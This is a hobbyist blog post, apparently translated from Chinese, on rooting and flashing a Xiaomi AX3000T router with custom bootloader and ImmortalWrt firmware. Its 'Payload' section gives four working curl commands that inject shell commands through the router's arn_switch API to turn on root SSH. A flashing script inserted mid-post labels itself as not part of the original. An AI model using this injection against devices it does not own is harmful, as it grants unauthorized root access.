Seiry

Xiaomi AX3000T router flashing

Introduction

What does "前朝遗老" (an old-timer of the former dynasty) mean? (Tactical backward lean.) At the end of the month there was still some reimbursement quota left, so I bought an ax3000t for 180 yuan to play with. It was delivered at four in the afternoon, and at eight in the evening the Wi-Fi 7 certification was issued.

Just waiting for me to become an old-timer of the former dynasty, right?

Machine

I have a very good impression of Brother Fa (MediaTek), especially its router SoC solutions; Broadcom, Qualcomm and the rest really don't deliver as good an experience as Brother Fa.

Xiaomi's ax3000t uses a very mature solution.

key        value
soc/cpu    MT7981B, aka Filogic 820, A53*2 @1.3GHz, 12nm
memory     256MB DDR3
flash      128MB
antenna    5!! (3 * 5G + 2 * 2.4G)

The reason for choosing it is, first, it is cheap, just within the affordable price range, and second, I have never played with MT7981B before, only its big brother, so I got it to play with.

The board ID is similar to the WR30U's; the differences are that the ax3000t lacks the rear shield, and the antenna count does not match either.
Because... on the surface the ax3000t has four antennas, but in reality it has five...


Beginning and End

Xiaomi had just released its first-generation routers when I was still in middle school.

But at that time, and for a long time afterwards, the non-flagship models could truly be described as electronic waste.

The one that left the deepest impression on me is the 4c. It's hard to imagine that during my college years, in the pre-COVID era, this device with only three ports and four antennas on its back was used by my roommate in the dorm for four years! And it sold for 79 yuan! 79 yuan! And even today it can still be bought in the Xiaomi store!


I really can't imagine what the difference is between this thing and the tiny 150M single-antenna Mercury router I used in the ancient years.

But today things really have improved a bit, and Xiaomi's non-flagship routers have shown some conscience. Although they sometimes upgrade and downgrade the configuration, at least they no longer have the stupidity of three ports and four antennas. Many of Xiaomi's models are also the most cost-effective, and to a large extent the most secure (except for the intentionally left vulnerabilities).

Recently the ax3000t has been called the cost-performance ceiling for entry-level home Wi-Fi 6 routers.

With the certification issued today, it is likely to be the last Wi-Fi 6 ceiling. A newly issued certification is the best excuse to raise prices. Wi-Fi 7 isn't useful yet, most people who won't splurge on Wi-Fi 7 haven't even bought Wi-Fi 6, and college students are still using the four-antenna 100M original-flavour router, but price increases are always good.

Compared to Qualcomm's solutions, Brother Fa runs cooler, has a better ecosystem, a solid foundation and a lower price. Although the driver is a binary blob, at least the blob is uploaded to git, and closed source beats no source.

Flashing

Actually, the original motivation for writing this article was that there was no single place covering how to flash the ax3000t. On the one hand, few experts buy entry-level routers like the ax3000t; on the other hand, everyone likes to make some money off it, which is also a reflection of the economic downturn.

Enabling ssh/dropbear

There is a command injection vulnerability in Xiaomi's recent models.

[STOK] is a 32-character hexadecimal token; it is visible in the URL after logging into the Xiaomi router's web admin.

Replace [STOK] in the payload with the valid token obtained after logging in, and run the payload in a bash-like environment. Quote the URL: the `;` inside it would otherwise be treated by the shell as a command separator.

As always, 192.168.31.1 is the ax3000t's default address.

Payload

curl -X POST 'http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch' -d "open=1&model=1&level=%0Anvram%20set%20ssh_en%3D1%0A"
curl -X POST 'http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch' -d "open=1&model=1&level=%0Anvram%20commit%0A"
curl -X POST 'http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch' -d "open=1&model=1&level=%0Ased%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%22debug%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%0A"
curl -X POST 'http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch' -d "open=1&model=1&level=%0A%2Fetc%2Finit.d%2Fdropbear%20start%0A"

SSH password

Xiaomi routers derive the password with a fixed algorithm, using the SN as the seed.

You can find it on many websites; note that the SN is case-sensitive.

The resulting root password should be eight characters long.

Connection

Dropbear takes about 10 seconds to start.

Xiaomi's OpenWrt still uses an old RSA host key (ssh-rsa), which recent OpenSSH releases (8.8 and later) disable by default, so connect via SSH with that algorithm re-enabled:

ssh -oHostKeyAlgorithms=+ssh-rsa root@192.168.31.1


We can see the familiar "Little Strong" 5.4.171.

I think, you, Little Strong, must have grown up eating penguins, right? Hahaha

Upload

https://github.com/hanwckf/bl-mt798x/releases/ hosts the U-Boot builds for the mt857 family. In my opinion, college students should use this kind of 857 router: go to a 985 and jump to 857. How can four antennas match a double first-class university?

In the release zip you can see the handsome guy mt7981_ax3000t-fip***.bin.

Upload it to /tmp using scp or another method.

Flashing

The target partition is FIP.

cd /tmp
mtd write mt7981_ax3000t-fip-fixed-parts-multi-layout.bin FIP
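Writing the FIP partition replaces the bootloader, so it is worth checking the image and keeping a copy of what is there before running `mtd write`. The script below is an added example, not part of the original post or of the bl-mt798x project: it verifies the image against a SHA-256 digest you take from the release page, locates the FIP device in /proc/mtd, backs it up to /tmp, and only then writes. The /proc/mtd listing embedded for the demonstration is constructed; the partition names and sizes on a real ax3000t come from the router's own /proc/mtd, and the `mtd` and `sha256sum` tools are assumed to be present on the box.

```shell
#!/bin/sh
# Added example (not from the original post): a pre-flight wrapper around
# "mtd write <image> FIP". Nothing below touches hardware unless flash_fip
# is called explicitly on the router.

# Print the mtd device (e.g. "mtd3") whose quoted name equals $2, given a
# /proc/mtd listing as $1. Prints nothing if the partition is absent.
find_mtd_dev() {
    printf '%s\n' "$1" | awk -v want="\"$2\"" '
        $4 == want { sub(":", "", $1); print $1; exit }'
}

# Compare an image against an expected SHA-256 hex digest; 0 on match.
verify_image() {
    actual=$(sha256sum "$1" | awk '{ print $1 }')
    [ "$actual" = "$2" ]
}

# Verify, back up the current partition contents, then write.
# Usage (on the router): flash_fip /tmp/<fip image>.bin <sha256 from release page>
flash_fip() {
    image=$1; expected_sha=$2; part=${3:-FIP}
    [ -f "$image" ] || { echo "no such image: $image" >&2; return 1; }
    verify_image "$image" "$expected_sha" \
        || { echo "checksum mismatch, refusing to flash" >&2; return 1; }
    dev=$(find_mtd_dev "$(cat /proc/mtd)" "$part")
    [ -n "$dev" ] || { echo "partition $part not found in /proc/mtd" >&2; return 1; }
    dd if="/dev/$dev" of="/tmp/$part.bak" 2>/dev/null \
        || { echo "backup of $part failed" >&2; return 1; }
    echo "backup saved to /tmp/$part.bak; writing $image to $part"
    mtd write "$image" "$part"
}

# Constructed /proc/mtd sample for the demonstration; names and sizes are
# illustrative only and are not the ax3000t's real layout.
SAMPLE_MTD='dev:    size   erasesize  name
mtd0: 00100000 00020000 "BL2"
mtd1: 00080000 00020000 "Nvram"
mtd2: 00200000 00020000 "Factory"
mtd3: 00200000 00020000 "FIP"
mtd4: 06c00000 00020000 "ubi"'

# Dry demonstration: only resolve the device name from the sample listing.
echo "FIP lives on /dev/$(find_mtd_dev "$SAMPLE_MTD" FIP)"
```

Keep the backup off the router (scp it back to your machine) before you reboot: /tmp lives in RAM and is gone once U-Boot takes over.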

Power on

After unplugging the power, hold down the reset button and plug it back in. Keep holding for about 10 seconds, and you will see the LED change color.

It is important to note that the ax3000t differs from the ax6000 and does not follow Xiaomi's ancestral convention: under U-Boot the ax3000t's IP address is 192.168.1.1, not 192.168.31.1.

Connect the router to the computer with a wired connection, and set the gateway to 192.168.1.1.

Access 192.168.1.1.

Flashing

An ImmortalWrt variant for MediaTek mt798x routers.

For firmware, I prefer the immortalwrt written by the big guys of the 857 family. Immortal 857, doesn't that carry a deeper meaning?

Note that the stock partition layout is Xiaomi's ancestral A/B dual-slot layout (56M mode). I prefer to skip A/B and use the 112M layout directly.


When building, remember that the ax3000t's 256MB of memory doesn't stand up to much tinkering, and with the recent trend of projects running away there are many bugs and potential bugs in clash meta; it is easy to run out of memory on such a small body. As a college student, don't bloat it.

The 857 family's flash really is fast; it's done in an instant.

Conclusion

I am someone who likes buying routers. Starting from the Tomato router in my college office, I have been on the path of making everyone's network explode. Whether it was wiring up spider webs or wirelessly bridging across the swimming pool from the window, the days of playing with routers in college were really happy. Back then everyone was very tolerant: even if you only had three ports, even if you only had 100Mbps, everyone could carry on peacefully, because the campus network was only 20Mbps.
